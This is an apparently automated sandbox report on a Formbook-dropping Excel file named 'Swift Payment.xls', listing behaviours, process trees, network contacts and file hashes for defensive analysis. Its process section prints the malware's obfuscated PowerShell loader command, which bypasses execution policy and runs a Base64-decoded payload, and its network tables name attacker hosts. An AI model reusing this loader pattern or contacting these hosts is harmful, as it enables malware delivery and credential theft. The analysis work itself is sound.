Malware Analysis Report

2025-01-18 12:24

Sample ID: 240829-rkar8swbpf
Target: Swift Payment.xls
SHA256: eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847
Tags: formbook b48n defense_evasion discovery execution rat spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

SHA256: eaf3b9c1bdaf72da0a5d2a1a8c4f128712463c558e8af23830126bf07ef63847

Threat Level: Known bad

The file Swift Payment.xls was found to be: Known bad.

Malicious Activity Summary

formbook b48n defense_evasion discovery execution rat spyware stealer trojan

Formbook

Process spawned unexpected child process

Formbook payload

Evasion via Device Credential Deployment

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Drops file in System32 directory

Suspicious use of SetThreadContext

System Location Discovery: System Language Discovery

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Checks processor information in registry

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy service COM API

Modifies Internet Explorer settings

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: MapViewOfSection

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported: 2024-08-29 14:14

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted: 2024-08-29 14:14

Reported: 2024-08-29 14:17

Platform: win7-20240704-en

Max time kernel: 149s

Max time network: 133s

Command Line

C:\Windows\Explorer.EXE

Signatures

Formbook

trojan spyware stealer formbook

Formbook payload

rat
Description | Indicator | Process | Target
N/A | N/A | N/A | N/A
N/A | N/A | N/A | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Evasion via Device Credential Deployment

defense_evasion execution
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Executes dropped EXE

Description | Indicator | Process | Target
N/A | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A
N/A | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A

Loads dropped DLL

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Drops file in System32 directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 1984 set thread context of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 2460 set thread context of 1208 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Windows\Explorer.EXE
PID 2844 set thread context of 1208 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\Explorer.EXE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\explorer.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\explorer.exe | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A
Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2688 wrote to memory of 820 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 820 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 820 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 2688 wrote to memory of 820 | N/A | C:\Windows\SysWOW64\mshta.exe | C:\Windows\SysWOW64\cmd.exe
PID 820 wrote to memory of 1860 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1860 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1860 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 820 wrote to memory of 1860 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1860 wrote to memory of 1944 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1860 wrote to memory of 1944 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1860 wrote to memory of 1944 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1860 wrote to memory of 1944 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
PID 1944 wrote to memory of 1184 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1944 wrote to memory of 1184 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1944 wrote to memory of 1184 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1944 wrote to memory of 1184 | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
PID 1860 wrote to memory of 1984 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1860 wrote to memory of 1984 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1860 wrote to memory of 1984 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1860 wrote to memory of 1984 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1984 wrote to memory of 2460 | N/A | C:\Users\Admin\AppData\Roaming\MEmpEng.exe | C:\Users\Admin\AppData\Roaming\MEmpEng.exe
PID 1208 wrote to memory of 2844 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\explorer.exe
PID 1208 wrote to memory of 2844 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\explorer.exe
PID 1208 wrote to memory of 2844 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\explorer.exe
PID 1208 wrote to memory of 2844 | N/A | C:\Windows\Explorer.EXE | C:\Windows\SysWOW64\explorer.exe
PID 2844 wrote to memory of 324 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 324 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 324 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\SysWOW64\cmd.exe
PID 2844 wrote to memory of 324 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\SysWOW64\cmd.exe

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Windows\SysWOW64\mshta.exe

C:\Windows\SysWOW64\mshta.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" "/C poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'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'+[cHAR]34+'))')))"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

poWERShElL.exe -eX ByPaSS -NOp -W 1 -C DeVIcEcReDENtialdePLOYMENt.EXE ; iEx($(IeX('[systeM.TEXt.EncoDINg]'+[CHaR]0X3A+[cHaR]58+'UtF8.geTsTrING([sYsTEm.coNverT]'+[CHar]0x3A+[chAR]58+'fRomBAse64sTrinG('+[ChAR]0X22+'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'+[cHAR]34+'))')))"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\m9glxv2r.cmdline"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCEC5.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCEC4.tmp"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

"C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

C:\Windows\SysWOW64\explorer.exe

"C:\Windows\SysWOW64\explorer.exe"

C:\Windows\SysWOW64\cmd.exe

/c del "C:\Users\Admin\AppData\Roaming\MEmpEng.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | zhort.de | udp
DE | 88.99.66.38:443 | zhort.de | tcp
US | 8.8.8.8:53 | e6.o.lencr.org | udp
GB | 2.16.170.42:80 | e6.o.lencr.org | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
DE | 88.99.66.38:443 | zhort.de | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
US | 8.8.8.8:53 | crl.microsoft.com | udp
GB | 2.19.252.157:80 | crl.microsoft.com | tcp
US | 8.8.8.8:53 | www.leaningcompanies-near-me.today | udp
US | 8.8.8.8:53 | www.5571.club | udp
US | 8.8.8.8:53 | www.srsvrfive.xyz | udp
US | 8.8.8.8:53 | www.op-smartphone-deals.today | udp

Files

memory/2276-1-0x0000000071FED000-0x0000000071FF8000-memory.dmp

memory/2276-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2688-19-0x00000000025B0000-0x00000000025B2000-memory.dmp

memory/2276-20-0x0000000002420000-0x0000000002422000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 603c5da8c0b5fe7205a5f3e72cec9482
SHA1 2d323cfc3f157f4f77adfea98fdf3d8494f87d27
SHA256 e6d873379836293e2df10f1444e76516b7891b092c1be540c2a1e820b2d62d13
SHA512 6adc8a4f80fc294aba1d4515f5e43a6acc3e4eedaa6785b3fcaf582ee3baee6e4692a2eb67f961801b74e4055c572e47a54f4530c6dd40bea6b7578bccdbaafb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7E8BDF27898FD04B591B0B0011B10808

MD5 759ed84c7a10931413e9616b819989c3
SHA1 da0f62501a26f2afe09105b250292eab898e3062
SHA256 c9878b853d06d37df8f1cba52b3ed4575ba683e38bd16f42062bf372efe0e8dc
SHA512 95e8a240a468a5f8497acf279b337f888d33f2f8ac334502b3fe5ddfbc13e2cbf23a727a3a7137bed187c23199b6d6a9fba2f355c7300dd39dc63dd21af75797

C:\Users\Admin\AppData\Local\Temp\CabABAA.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7E8BDF27898FD04B591B0B0011B10808

MD5 2a22d79f810194591562f5550fd2fdaf
SHA1 9085f1492a5bcc3f539169ebd82cbe8ead4f4eec
SHA256 d0321588aa29241312e1508e1013faabd7a815767235104fbe3a6b9b5600d9f1
SHA512 281e6f5ad830fb2cc0c08618a13b14b9e82a944ab2efb32999d2f9a89ae3be6854f9cf60de2910f3866a14deda74719d8676de82932ea3fdd581ecc75092b579

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 822467b728b7a66b081c91795373789a
SHA1 d8f2f02e1eef62485a9feffd59ce837511749865
SHA256 af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512 bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\IEnetstateIntenet[1].hta

MD5 1c08a8e3980fc2229abeea76dbf6d328
SHA1 189b2caf360cc40757ae8897aa4be78d465d0b3b
SHA256 b39a46724746ba0ff1f4c6a596a643c4281bc171adbdb269baa42e6f68cf395c
SHA512 8023ff2f97287f0069b6074dbaf412095cd8670e8baed8f961feec2f3be654bc6230b95a09777847c77496ff3ea2ac1ddf5b5fbb394b99e1186c0a899bc78e87

memory/2276-34-0x0000000071FED000-0x0000000071FF8000-memory.dmp

\??\c:\Users\Admin\AppData\Local\Temp\m9glxv2r.cmdline

MD5 d77938b87970b7fbfe88933c798068cb
SHA1 5af4971a41e26df349b470c22274bae321332768
SHA256 521548261d079fc88630d5a37d6b40ef8e8104caf2c195906debf1e3b1f43871
SHA512 9f23e77336702647a7f56fd85650bc9f675a4200d3d953abd290ead600b413db81d2ef406d621d181153250d73b1b8f3ed0ef9cb4214e5da52670004cb293f3a

\??\c:\Users\Admin\AppData\Local\Temp\m9glxv2r.0.cs

MD5 ea113715d78eb5483c3507b3cbaebc06
SHA1 daa1297b0545649dd504537c2810082ef4156c32
SHA256 812d03a581b330a9d0dc751fc29857600c7a6988b748fb5c091850c2ac1e0a7d
SHA512 3595451c9eccd0fda379e6d906f45c87b90f52e0c70b609145ec037127fb72001b8f38697ff497806bc20cbecbc0c29d3565db15cc08a4f420d97e65b1aaa051

\??\c:\Users\Admin\AppData\Local\Temp\CSCCEC4.tmp

MD5 a605be4920833aecd90fa003dd64909e
SHA1 7484f03596b48cbb168f1d6137f96061bde71362
SHA256 b1fe652d82d900482e59066ecfdb63cf8e64bb59ebe82ad4e223a0cc180dca42
SHA512 32d1fb29e959a1efa6616f401b880bf3483bb7df92f20384d58fa07bca8436501c42f072e6e5a05113000c750c4d8e7a6524c14cdd67d42589b58c05339de803

C:\Users\Admin\AppData\Local\Temp\RESCEC5.tmp

MD5 5069aec363046127f78dc287be7782fa
SHA1 1b553469f665d84707400792b22c97d49cce710d
SHA256 1189418bbdc7d61743e20ffd41eac8d074a13c95d50bd010ac21c701c92e8397
SHA512 4463de2dba36af3e9a7ae2222ebc4b71e8da094cc50a24b6da2c364ac14f5d6a93a53169146e6e64edba8907ca4744b7c7fe538b6fca5afcdc054084ce990c4c

C:\Users\Admin\AppData\Local\Temp\m9glxv2r.dll

MD5 91a571987480a1d92b545097ee28c4b4
SHA1 5b2751371aa3097686cb02a1de18d9d188ff939b
SHA256 0fbd19ab7049a34a1b28225580f4c17bb693632d0cd24b6a23341f3b8bb466ea
SHA512 da321bec27ffc01af1684c9ae4e8f9acbc59c66df268b03afd2185b88185701870f5571cc237d769386e1d78905b370b439f361b6389a318480914aa13738a68

C:\Users\Admin\AppData\Local\Temp\m9glxv2r.pdb

MD5 2195048dd458b08c3623987a45b265b6
SHA1 ce3d4c259a83c180575d84ceb3292d237ab6e552
SHA256 3956932ff549efc73b8b29a6900c2c786ea6bfb94cd6d72caba7bf8c0e473e07
SHA512 c64f75930525fc80f917bb72eecc57d6cdae6db31345653bcd49a4b644b1b24f57db847d3471198f95cf29ac392f9cbb058acbf28ed2ef9596de6d9ba59eb637

C:\Users\Admin\AppData\Roaming\MEmpEng.exe

MD5 dd2e0becfb1316c49975386fc3367c45
SHA1 98c578ff997ef781919ca5967251fa9d462a756e
SHA256 14d4d6df33e96af2a1d5ef8f8e7f6f1b914b0342b219c75f812848f52bc27628
SHA512 4768fa7aa32dc02e958c8506880311bb0d4fa5a9cd9fcdc6581a8349b1d85b3323513d28018b55ffbdb79e440e4b371dfb260cbd097ffd2279993b9a1a416bfb

memory/1984-65-0x0000000000D40000-0x0000000000DDC000-memory.dmp

memory/1984-66-0x0000000000D20000-0x0000000000D38000-memory.dmp

memory/1984-67-0x0000000004890000-0x0000000004906000-memory.dmp

memory/2460-72-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2460-68-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2460-70-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2460-73-0x0000000000400000-0x000000000042F000-memory.dmp

memory/2844-76-0x0000000000090000-0x0000000000311000-memory.dmp

memory/2844-77-0x0000000000320000-0x000000000034F000-memory.dmp

memory/1208-81-0x0000000006EC0000-0x0000000006FCB000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FA663E76.emf

MD5 8a188a6917ad1fa0c7f1aa20a63c8593
SHA1 4d2270d647d4a3680b47e85501c7ab1442ddcbb2
SHA256 728a3d9b1bee7cd8baa90aa0b1a4805a93238c8f835ea685931ac676ba7ef3e3
SHA512 823246cac3d8a45980ce0623c485fb0b74ce7aa68cca37b22fef1924685f1201298163c398688057736ec4551999b5455db1c97abc7da97e5a07589cd4fd7cdf

memory/2276-86-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2276-89-0x0000000071FED000-0x0000000071FF8000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted: 2024-08-29 14:14

Reported: 2024-08-29 14:17

Platform: win10v2004-20240802-en

Max time kernel: 145s

Max time network: 131s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

Signatures

Process spawned unexpected child process

Description | Indicator | Process | Target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

Checks processor information in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Enumerates system info in registry

Description | Indicator | Process | Target
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious behavior: AddClipboardFormatListener

Description | Indicator | Process | Target
N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 948 wrote to memory of 3192 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe
PID 948 wrote to memory of 3192 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE

"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Swift Payment.xls"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4156,i,9445584274764997943,12714240264001792460,262144 --variations-seed-version --mojo-platform-channel-handle=4032 /prefetch:8

C:\Windows\System32\mshta.exe

C:\Windows\System32\mshta.exe -Embedding

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.32.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | roaming.officeapps.live.com | udp
GB | 52.109.28.47:443 | roaming.officeapps.live.com | tcp
US | 8.8.8.8:53 | zhort.de | udp
DE | 88.99.66.38:443 | zhort.de | tcp
US | 8.8.8.8:53 | 47.28.109.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 73.144.22.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 38.66.99.88.in-addr.arpa | udp
US | 8.8.8.8:53 | e6.o.lencr.org | udp
GB | 2.16.170.50:80 | e6.o.lencr.org | tcp
US | 8.8.8.8:53 | g.bing.com | udp
US | 150.171.28.10:443 | g.bing.com | tcp
NL | 45.89.247.151:80 | 45.89.247.151 | tcp
US | 8.8.8.8:53 | 40.13.222.173.in-addr.arpa | udp
US | 8.8.8.8:53 | 4.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 50.170.16.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp
US | 8.8.8.8:53 | 151.247.89.45.in-addr.arpa | udp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 24.73.42.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp
US | 8.8.8.8:53 | 65.139.73.23.in-addr.arpa | udp
US | 8.8.8.8:53 | 81.144.22.2.in-addr.arpa | udp
US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp
US | 150.171.28.10:443 | tse1.mm.bing.net | tcp

Files

memory/948-0-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-6-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-5-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-4-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-7-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-9-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-10-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-8-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-12-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-11-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-13-0x00007FFE7C2C0000-0x00007FFE7C2D0000-memory.dmp

memory/948-3-0x00007FFEBEBAD000-0x00007FFEBEBAE000-memory.dmp

memory/948-14-0x00007FFE7C2C0000-0x00007FFE7C2D0000-memory.dmp

memory/948-2-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/948-1-0x00007FFE7EB90000-0x00007FFE7EBA0000-memory.dmp

memory/3192-36-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-37-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-39-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/948-42-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-46-0x00007FFEBEB10000-0x00007FFEBED05000-memory.dmp

memory/3192-47-0x00007FF62D9C0000-0x00007FF62D9C8000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms

MD5 135acfab77825c317285aba38ea0d7a1
SHA1 44ef8388b93aacf814e8510475be5fa9dbb937fd
SHA256 1043e62d3ffc656abe791ae8b0044acd96e1ee96a2eb1ba5d710978596260145
SHA512 0bb1f91211059a5f4765809499f82cad46125b9e6c3ed6a6932d5f76e5d5564fdcd359b18b93154cb77bc7fcaee148ce5da3b7489a1688a5a4e68c6ab921ba30

